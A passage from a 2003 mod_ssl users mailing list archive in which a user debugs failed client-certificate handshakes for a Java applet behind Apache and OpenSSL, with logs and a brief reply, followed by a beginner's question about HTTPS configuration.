combination including the SSL setup seems to be right in principal).

However the 4th application doesn't work.

The fourth application is not JSP, but a Servlet/Applet combination.

What happens when accessing the page is that the "index.html" downloads to
the client, but then the applet should be retrieved by the browser
(IE/Java plug-in), but the JAVA Plug-In just says "applet not found", and
in the web-server error file (put in INFO) I see the following:

[Tue Aug 05 18:56:52 2003] [info] Connection to child 4 established
(server esdsv07.my.com:443, client 115.191.1.8)
[Tue Aug 05 18:56:52 2003] [info] Seeding PRNG with 136 bytes of entropy
[Tue Aug 05 18:56:52 2003] [info] SSL library error 1 in handshake (server
esdsv07.my.com:443, client 115.191.1.8)
[Tue Aug 05 18:56:52 2003] [info] SSL Library Error: 336105671
error:140890C7:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not
return a certificate No CAs known to server for verification?
[Tue Aug 05 18:56:52 2003] [info] Connection to child 4 closed with
abortive shutdown(server esdsv07.my.com:443, client 115.191.1.8)
[Tue Aug 05 18:56:52 2003] [info] Connection to child 69 established
(server esdsv07.my.com:443, client 115.136.126.30)
[Tue Aug 05 18:56:52 2003] [info] Seeding PRNG with 136 bytes of entropy
[Tue Aug 05 18:56:53 2003] [info] SSL library error 1 in handshake (server
esdsv07.my.com:443, client 115.136.126.30)
[Tue Aug 05 18:56:53 2003] [info] SSL Library Error: 336105671
error:140890C7:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not
return a certificate No CAs known to server for verification?
[Tue Aug 05 18:56:53 2003] [info] Connection to child 69 closed with
abortive shutdown(server esdsv07.my.com:443, client 115.136.126.30)


I know, normally this "peer did not return a certificate" indicates that
either my browser does not have a certificate (which it has) or that the
certificate can not be verified by the server due to a missing CA
certificate (which it has). If one of these or both problems were there,
the other three applications would not work as well, right? But they do!

Any ideas?

If I switch on debug level, I get even more info (which does not tell me a
lot more). First there is a verification/handshake on client certificate A
(successful) and then there is something about a certificate B????? what
is this about? What is certificate A and B?

   Thanks in advance

        Herbert

Debugging info:

[Tue Aug 05 19:14:46 2003] [info] Loading certificate & private key of
SSL-aware server
[Tue Aug 05 19:14:46 2003] [info] Init: Requesting pass phrase from dialog
filter program (/opt/hpws/apache/conf/passPhrase.dialog)
[Tue Aug 05 19:14:46 2003] [debug] ssl_engine_pphrase.c(499): encrypted
RSA private key - pass phrase requested
[Tue Aug 05 19:14:48 2003] [info] Configuring server for SSL protocol [Tue
Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(436): Creating new SSL
context (protocols: SSLv2, SSLv3, TLSv1)
[Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(553): Configuring
client authentication
[Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(1096): CA
certificate: /O=my.com/OU=IT Infrastructure/C=US/O=MY Company/CN=MY
Primary Class 2 Certification Authority
[Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(611): Configuring
permitted SSL ciphers
[!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL]
[Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(739): Configuring RSA
server certificate
[Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(778): Configuring RSA
server private key
[Tue Aug 05 19:14:49 2003] [info] Loading certificate & private key of
SSL-aware server
[Tue Aug 05 19:14:49 2003] [info] esdsv07.my.com:443 reusing existing RSA
private key on restart
[Tue Aug 05 19:14:51 2003] [info] Configuring server for SSL protocol [Tue
Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(436): Creating new SSL
context (protocols: SSLv2, SSLv3, TLSv1)
[Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(553): Configuring
client authentication
[Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(1096): CA
certificate: /O=my.com/OU=IT Infrastructure/C=US/O=MY Company/CN=MY
Primary Class 2 Certification Authority
[Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(611): Configuring
permitted SSL ciphers
[!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL]
[Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(739): Configuring RSA
server certificate
[Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(778): Configuring RSA
server private key
[Tue Aug 05 19:15:02 2003] [info] Connection to child 64 established
(server esdsv07.my.com:443, client 115.136.126.30)
[Tue Aug 05 19:15:02 2003] [info] Seeding PRNG with 136 bytes of entropy
[Tue Aug 05 19:15:02 2003] [debug] ssl_engine_kernel.c(1764):
OpenSSL:Handshake: start
[Tue Aug 05 19:15:02 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: before/accept initialization


[---lots of stuff/binary dump omitted---]


[Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSLv3 read finished A
[Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSLv3 write change cipher spec A
[Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSLv3 write finished A
[Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSLv3 flush data
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(708): inside
shmcb_store_session
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(714):
session_id[0]=106, masked index=10
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1089): entering
shmcb_insert_encoded_session, *queue->pos_count = 0
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1013): entering
shmcb_expire_division
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1145): we have 14386
bytes and 133 indexes free - enough
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1174): storing in
index 0, at offset 0
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1189):
session_id[0]=106, idx->s_id2=63
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1200): leaving now
with 11 28 bytes in the cache and 1 indexes
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1204): leaving
shmcb_insert_encoded_session
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(742): leaving
shmcb_store successfully
[Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(437): shmcb_store
successful
[Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1610):
Inter-Process Session Cache: request=SET status=OK
id=6A3F782DD6F051D3FFBFDFC9AD3197731D1008BF6C16089DB3EF2B1875772849
timeout=296s (session caching)
[Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1768): OpenSSL:
Handshake


[--- another and another successful handshake following ---]

[--- even more stuff omitted, then something strange: ---]

[Tue Aug 05 19:15:13 2003] [info] Connection to child 1 established
(server esdsv07.my.com:443, client 15.191.1.8)
[Tue Aug 05 19:15:13 2003] [info] Seeding PRNG with 136 bytes of entropy
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1764): OpenSSL:
Handshake : start
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: before/accept initialization
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_io.c(1478): OpenSSL: read
11/11 by tes from BIO#40239088 [mem: 403f1568] (BIO dump follows)

[--bio dump left out--]

[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSLv3 read client hello A
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSLv3 write server hello A
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSLv3 write certificate A
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSLv3 write certificate request A
[Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
Loop: SSLv3 flush data
[Tue Aug 05 19:15:14 2003] [debug] ssl_engine_io.c(1478): OpenSSL: read
5/5 bytes from BIO#40239088 [mem: 403f1568] (BIO dump follows)

[--another bio dump left out-- so far the usuall success, but now....]

[Tue Aug 05 19:15:14 2003] [debug] ssl_engine_kernel.c(1782): OpenSSL:
Write: SSLv3 read client certificate B
[Tue Aug 05 19:15:14 2003] [debug] ssl_engine_kernel.c(1801): OpenSSL:
Exit: error in SSLv3 read client certificate B
[Tue Aug 05 19:15:14 2003] [debug] ssl_engine_kernel.c(1801): OpenSSL:
Exit: error in SSLv3 read client certificate B
[Tue Aug 05 19:15:14 2003] [info] SSL library error 1 in handshake (server
esdsv07.my.com:443, client 115.191.1.8)
[Tue Aug 05 19:15:14 2003] [info] SSL Library Error: 336105671
error:140890C7:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not
return a certificate No CAs known to server for verification?
[Tue Aug 05 19:15:14 2003] [info] Connection to child 1 closed with
abortive shutdown(server esdsv07.my.com:443, client 115.191.1.8)
[Tue Aug 05 19:15:14 2003] [info] Connection to child 66 established
(server esdsv07.my.com:443, client 115.136.126.30)



 It started with read/writen client certificate A, no error, then suddenly
says something about client certificate B, which fails. What is client
certificate B?



-- 
Herbert Neugebauer
hnbw1@veces.bb.bawue.de
71088 Holzgerlingen      Germany
*****
War does not decide who's right, only who's left
    -- unknown quote

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 14 07:46:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 93432A8945; Thu, 14 Aug 2003 07:46:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hitpro.hitachi.co.jp (hitpro.hitachi.co.jp [133.145.224.7])
	by master.modssl.org (Postfix) with ESMTP id 35371A8934
	for ; Thu, 14 Aug 2003 07:46:39 +0200 (CEST)
Received: from mc4.mcg.hitachi.co.jp by hitpro.hitachi.co.jp (8.12.9/eHI-hitpro) id h7E5kMke019701; Thu, 14 Aug 2003 14:46:22 +0900 (JST)
Received: (from root@localhost)
	by mc4.mcg.hitachi.co.jp (8.11.6+Sun/8.11.6) id h7E5kKA13789
	for ; Thu, 14 Aug 2003 14:46:20 +0900 (JST)
Received: from unknown [192.168.2.1] by mc4.mcg.hitachi.co.jp with SMTP id QAA13788 ; Thu, 14 Aug 2003 14:46:20 +0900
Received: from navsg1.hitachi.co.jp by navsg1.hitachi.co.jp (8.9.3/3.7W-navsg1) id OAA18182; Thu, 14 Aug 2003 14:46:20 +0900 (JST)
Received: from mlsv5.itg.hitachi.co.jp ([158.213.165.104])
 by navsg1.hitachi.co.jp (NAVGW 2.5.2.17) with SMTP id M2003081414461903221
 ; Thu, 14 Aug 2003 14:46:19 +0900
Received: from navgw14.itg.hitachi.co.jp by mlsv5.itg.hitachi.co.jp (8.12.6/8.12.6) id h7E5kEp6007235; Thu, 14 Aug 2003 14:46:19 +0900
Received: from bisdgw.bisd.hitachi.co.jp ([133.144.87.253])
 by navgw14.itg.hitachi.co.jp (SAVSMTP 3.1.1.32) with SMTP id M2003081414461907035
 ; Thu, 14 Aug 2003 14:46:19 +0900
Received: from bisdmail.bisd.hitachi.co.jp
	by bisdgw.bisd.hitachi.co.jp (8.9.3+3.2W/3.7W-bisdgw) with ESMTP id OAA22083;
	Thu, 14 Aug 2003 14:46:19 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Received: from localhost
	by bisdmail.bisd.hitachi.co.jp (8.11.3/3.7W-bisdmail) with ESMTP id h7E5kIo59080;
	Thu, 14 Aug 2003 14:46:18 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Date: Thu, 14 Aug 2003 14:45:47 +0900 (JST)
Message-Id: <20030814.144547.74694272.kiyoshi@bisd.hitachi.co.jp>
To: modssl-users@modssl.org, hnbw1@veces.bb.bawue.de
Cc: kiyoshi@bisd.hitachi.co.jp
Subject: Re: Certificate verification problem (required client certificate)
From: Kiyoshi Watanabe 
In-Reply-To: <47073.192.6.76.72.1060774772.squirrel@my.bawue.de>
References: <47073.192.6.76.72.1060774772.squirrel@my.bawue.de>
X-Mailer: Mew version 2.1 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kiyoshi Watanabe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hello,

I have seen the similar questions posted on the openssl mailing list
before, but I have not seen much discussion. One thing that you may
want to try to upgrade the version of the openssl itself, but I have
no clue that applies to your problem.

Why don't you post this question on the openssl mailing list?, hopoing
to get that somebody solves the question since then.

-Kiyoshi
Kiyoshi Watanabe





> Hello,
> 
> I posted this question already some days ago, but did not yet receive any
> hint. Does really no-one have any idea what could be the problem?
> 
> -----------------------
> 
> I'm having a strange problem with Apache 2.0.45, mod_ssl with openssl
> 0.9.6i  (and possibly a factor also tomcat 4.1.27 server, client IE6 with
> Java 1.4 plugin from Sun).
> 
> The web-server should run all applications only over SSL and with client
> certificate verification enabled.
> 
> So I set up all the necessary configuration, including server and client
> certificates (our company has it's own internal CA), and moved three
> different applications from the non-SSL to the SSL virtual-host.
> Everything works fine, the applications can access the "environment
> variables", where the user-ID coming from the certificate is stored, in
> order to authenticate the users and provide user-specific content. One of
> the working applications is PHP based, another one is JSP based, so via
> Tomcat. (only explaining this so that it is clear the whole server
> combination including the SSL setup seems to be right in principal).
> 
> However the 4th application doesn't work.
> 
> The fourth application is not JSP, but a Servlet/Applet combination.
> 
> What happens when accessing the page is that the "index.html" downloads to
> the client, but then the applet should be retrieved by the browser
> (IE/Java plug-in), but the JAVA Plug-In just says "applet not found", and
> in the web-server error file (put in INFO) I see the following:
> 
> [Tue Aug 05 18:56:52 2003] [info] Connection to child 4 established
> (server esdsv07.my.com:443, client 115.191.1.8)
> [Tue Aug 05 18:56:52 2003] [info] Seeding PRNG with 136 bytes of entropy
> [Tue Aug 05 18:56:52 2003] [info] SSL library error 1 in handshake (server
> esdsv07.my.com:443, client 115.191.1.8)
> [Tue Aug 05 18:56:52 2003] [info] SSL Library Error: 336105671
> error:140890C7:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not
> return a certificate No CAs known to server for verification?
> [Tue Aug 05 18:56:52 2003] [info] Connection to child 4 closed with
> abortive shutdown(server esdsv07.my.com:443, client 115.191.1.8)
> [Tue Aug 05 18:56:52 2003] [info] Connection to child 69 established
> (server esdsv07.my.com:443, client 115.136.126.30)
> [Tue Aug 05 18:56:52 2003] [info] Seeding PRNG with 136 bytes of entropy
> [Tue Aug 05 18:56:53 2003] [info] SSL library error 1 in handshake (server
> esdsv07.my.com:443, client 115.136.126.30)
> [Tue Aug 05 18:56:53 2003] [info] SSL Library Error: 336105671
> error:140890C7:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not
> return a certificate No CAs known to server for verification?
> [Tue Aug 05 18:56:53 2003] [info] Connection to child 69 closed with
> abortive shutdown(server esdsv07.my.com:443, client 115.136.126.30)
> 
> 
> I know, normally this "peer did not return a certificate" indicates that
> either my browser does not have a certificate (which it has) or that the
> certificate can not be verified by the server due to a missing CA
> certificate (which it has). If one of these or both problems were there,
> the other three applications would not work as well, right? But they do!
> 
> Any ideas?
> 
> If I switch on debug level, I get even more info (which does not tell me a
> lot more). First there is a verification/handshake on client certificate A
> (successful) and then there is something about a certificate B????? what
> is this about? What is certificate A and B?
> 
>    Thanks in advance
> 
>         Herbert
> 
> Debugging info:
> 
> [Tue Aug 05 19:14:46 2003] [info] Loading certificate & private key of
> SSL-aware server
> [Tue Aug 05 19:14:46 2003] [info] Init: Requesting pass phrase from dialog
> filter program (/opt/hpws/apache/conf/passPhrase.dialog)
> [Tue Aug 05 19:14:46 2003] [debug] ssl_engine_pphrase.c(499): encrypted
> RSA private key - pass phrase requested
> [Tue Aug 05 19:14:48 2003] [info] Configuring server for SSL protocol [Tue
> Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(436): Creating new SSL
> context (protocols: SSLv2, SSLv3, TLSv1)
> [Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(553): Configuring
> client authentication
> [Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(1096): CA
> certificate: /O=my.com/OU=IT Infrastructure/C=US/O=MY Company/CN=MY
> Primary Class 2 Certification Authority
> [Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(611): Configuring
> permitted SSL ciphers
> [!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL]
> [Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(739): Configuring RSA
> server certificate
> [Tue Aug 05 19:14:48 2003] [debug] ssl_engine_init.c(778): Configuring RSA
> server private key
> [Tue Aug 05 19:14:49 2003] [info] Loading certificate & private key of
> SSL-aware server
> [Tue Aug 05 19:14:49 2003] [info] esdsv07.my.com:443 reusing existing RSA
> private key on restart
> [Tue Aug 05 19:14:51 2003] [info] Configuring server for SSL protocol [Tue
> Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(436): Creating new SSL
> context (protocols: SSLv2, SSLv3, TLSv1)
> [Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(553): Configuring
> client authentication
> [Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(1096): CA
> certificate: /O=my.com/OU=IT Infrastructure/C=US/O=MY Company/CN=MY
> Primary Class 2 Certification Authority
> [Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(611): Configuring
> permitted SSL ciphers
> [!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL]
> [Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(739): Configuring RSA
> server certificate
> [Tue Aug 05 19:14:51 2003] [debug] ssl_engine_init.c(778): Configuring RSA
> server private key
> [Tue Aug 05 19:15:02 2003] [info] Connection to child 64 established
> (server esdsv07.my.com:443, client 115.136.126.30)
> [Tue Aug 05 19:15:02 2003] [info] Seeding PRNG with 136 bytes of entropy
> [Tue Aug 05 19:15:02 2003] [debug] ssl_engine_kernel.c(1764):
> OpenSSL:Handshake: start
> [Tue Aug 05 19:15:02 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
> Loop: before/accept initialization
> 
> 
> [---lots of stuff/binary dump omitted---]
> 
> 
> [Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
> Loop: SSLv3 read finished A
> [Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
> Loop: SSLv3 write change cipher spec A
> [Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
> Loop: SSLv3 write finished A
> [Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
> Loop: SSLv3 flush data
> [Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(708): inside
> shmcb_store_session
> [Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(714):
> session_id[0]=106, masked index=10
> [Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1089): entering
> shmcb_insert_encoded_session, *queue->pos_count = 0
> [Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1013): entering
> shmcb_expire_division
> [Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1145): we have 14386
> bytes and 133 indexes free - enough
> [Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1174): storing in
> index 0, at offset 0
> [Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1189):
> session_id[0]=106, idx->s_id2=63
> [Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1200): leaving now
> with 11 28 bytes in the cache and 1 indexes
> [Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(1204): leaving
> shmcb_insert_encoded_session
> [Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(742): leaving
> shmcb_store successfully
> [Tue Aug 05 19:15:06 2003] [debug] ssl_scache_shmcb.c(437): shmcb_store
> successful
> [Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1610):
> Inter-Process Session Cache: request=SET status=OK
> id=6A3F782DD6F051D3FFBFDFC9AD3197731D1008BF6C16089DB3EF2B1875772849
> timeout=296s (session caching)
> [Tue Aug 05 19:15:06 2003] [debug] ssl_engine_kernel.c(1768): OpenSSL:
> Handshake
> 
> 
> [--- another and another successful handshake following ---]
> 
> [--- even more stuff omitted, then something strange: ---]
> 
> [Tue Aug 05 19:15:13 2003] [info] Connection to child 1 established
> (server esdsv07.my.com:443, client 15.191.1.8)
> [Tue Aug 05 19:15:13 2003] [info] Seeding PRNG with 136 bytes of entropy
> [Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1764): OpenSSL:
> Handshake : start
> [Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
> Loop: before/accept initialization
> [Tue Aug 05 19:15:13 2003] [debug] ssl_engine_io.c(1478): OpenSSL: read
> 11/11 by tes from BIO#40239088 [mem: 403f1568] (BIO dump follows)
> 
> [--bio dump left out--]
> 
> [Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
> Loop: SSLv3 read client hello A
> [Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
> Loop: SSLv3 write server hello A
> [Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
> Loop: SSLv3 write certificate A
> [Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
> Loop: SSLv3 write certificate request A
> [Tue Aug 05 19:15:13 2003] [debug] ssl_engine_kernel.c(1772): OpenSSL:
> Loop: SSLv3 flush data
> [Tue Aug 05 19:15:14 2003] [debug] ssl_engine_io.c(1478): OpenSSL: read
> 5/5 bytes from BIO#40239088 [mem: 403f1568] (BIO dump follows)
> 
> [--another bio dump left out-- so far the usuall success, but now....]
> 
> [Tue Aug 05 19:15:14 2003] [debug] ssl_engine_kernel.c(1782): OpenSSL:
> Write: SSLv3 read client certificate B
> [Tue Aug 05 19:15:14 2003] [debug] ssl_engine_kernel.c(1801): OpenSSL:
> Exit: error in SSLv3 read client certificate B
> [Tue Aug 05 19:15:14 2003] [debug] ssl_engine_kernel.c(1801): OpenSSL:
> Exit: error in SSLv3 read client certificate B
> [Tue Aug 05 19:15:14 2003] [info] SSL library error 1 in handshake (server
> esdsv07.my.com:443, client 115.191.1.8)
> [Tue Aug 05 19:15:14 2003] [info] SSL Library Error: 336105671
> error:140890C7:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not
> return a certificate No CAs known to server for verification?
> [Tue Aug 05 19:15:14 2003] [info] Connection to child 1 closed with
> abortive shutdown(server esdsv07.my.com:443, client 115.191.1.8)
> [Tue Aug 05 19:15:14 2003] [info] Connection to child 66 established
> (server esdsv07.my.com:443, client 115.136.126.30)
> 
> 
> 
>  It started with read/writen client certificate A, no error, then suddenly
> says something about client certificate B, which fails. What is client
> certificate B?
> 
> 
> 
> -- 
> Herbert Neugebauer
> hnbw1@veces.bb.bawue.de
> 71088 Holzgerlingen      Germany
> *****
> War does not decide who's right, only who's left
>     -- unknown quote
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Aug 17 18:15:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E08CEA8963; Sun, 17 Aug 2003 18:15:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (bay8-dav25.bay8.hotmail.com [64.4.26.82])
	by master.modssl.org (Postfix) with ESMTP id EA01BA8933
	for ; Sun, 17 Aug 2003 18:15:39 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Sun, 17 Aug 2003 09:15:38 -0700
Received: from 82.65.123.246 by bay8-dav25.bay8.hotmail.com with DAV;
	Sun, 17 Aug 2003 16:15:37 +0000
X-Originating-IP: [82.65.123.246]
X-Originating-Email: [tril2632@hotmail.com]
From: "nico" 
To: 
Subject: Problem with Apache 2 and OpenSSL
Date: Sun, 17 Aug 2003 18:15:51 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_01DB_01C364EB.97862930"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Message-ID: 
X-OriginalArrivalTime: 17 Aug 2003 16:15:38.0511 (UTC) FILETIME=[CC0629F0:01C364DA]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "nico" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_01DB_01C364EB.97862930
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hello

So I start with Linux/Apache and openssl and I can't get running Apache =
2 and Openssl.

That's an extract of my httpd.conf

Listen 80



=20
DocumentRoot "/usr/local/apache/htdocs"
ServerName www.test.com
ServerAdmin test
ErrorLog /usr/local/apache/logs/error_log
TransferLog /usr/local/apache/logs/access_log
=20
SSLEngine on
SSLCertificateFile /usr/local/apache/conf/ssl.crt/www.test.com.cert
SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/www.test.com.key



When I try to connect with my brownser on http://www.test.com =3D> it's =
OK
but with https://www.test.com =3D> My brownser return me :"Unkown socket =
type"

If I try to connect me with shell to openssl it works.

I  start apache with

/usr/local/apache/bin/apachectl startssl

=3D> openssl prompt me for the pass

I give him the pass all is OK apache start http work but https doens't =
work
at all

Thanks for your help

------=_NextPart_000_01DB_01C364EB.97862930
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hello


 


So I start with Linux/Apache and =
openssl and I=20
can't get running Apache 2 and Openssl.


 


That's an extract of my =
httpd.conf


 


Listen 80


 


<IfDefine SSL>
<VirtualHost =
www.test.com:443>
 
Do=
cumentRoot=20
"/usr/local/apache/htdocs"
ServerName www.test.com
ServerAdmin =
test
ErrorLog=20
/usr/local/apache/logs/error_log
TransferLog=20
/usr/local/apache/logs/access_log
 
SSLEngine=20
on
SSLCertificateFile=20
/usr/local/apache/conf/ssl.crt/www.test.com.cert
SSLCertificateKeyFile=
=20
/usr/local/apache/conf/ssl.key/www.test.com.key
</VirtualHost></IfDefine>


 


When I try to connect with my brownser =
on http://www.test.com =3D> it's =
OK


but with https://www.test.com =3D> My =
brownser return me=20
:"Unkown socket type"


 


If I try to connect me with shell to =
openssl it=20
works.


 


I  start apache with

/usr/local/apache/bin/apachectl=20
startssl

=3D> openssl prompt me for the pass

I give him =
the pass=20
all is OK apache start http work but https doens't work
at all


 


Thanks for your =
help


------=_NextPart_000_01DB_01C364EB.97862930--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 18 02:40:34 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 47173A8963; Mon, 18 Aug 2003 02:40:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rk1.la0.iohost.com (adsl-67-115-75-1.dsl.lsan03.pacbell.net [67.115.75.1])
	by master.modssl.org (Postfix) with ESMTP id 802BEA8936
	for ; Mon, 18 Aug 2003 02:40:32 +0200 (CEST)
Received: from rk1.la0.iohost.com (localhost.localdomain [127.0.0.1])
	by rk1.la0.iohost.com (8.12.9/8.12.9) with ESMTP id h7I0eTPM009024;
	Sun, 17 Aug 2003 17:40:29 -0700
Received: from localhost (localhost [[UNIX: localhost]])
	by rk1.la0.iohost.com (8.12.9/8.12.8/Submit) id h7I0eOmH009023;
	Sun, 17 Aug 2003 17:40:24 -0700
Content-Type: text/plain;
  charset="iso-8859-1"
From: Randy Katz 
Organization: CCSALES
To: modssl-users@modssl.org, "nico" 
Subject: Re: Problem with Apache 2 and OpenSSL
Date: Sun, 17 Aug 2003 17:40:24 -0700
User-Agent: KMail/1.4.3
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <200308171740.24357.randyk@ccsales.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Randy Katz 
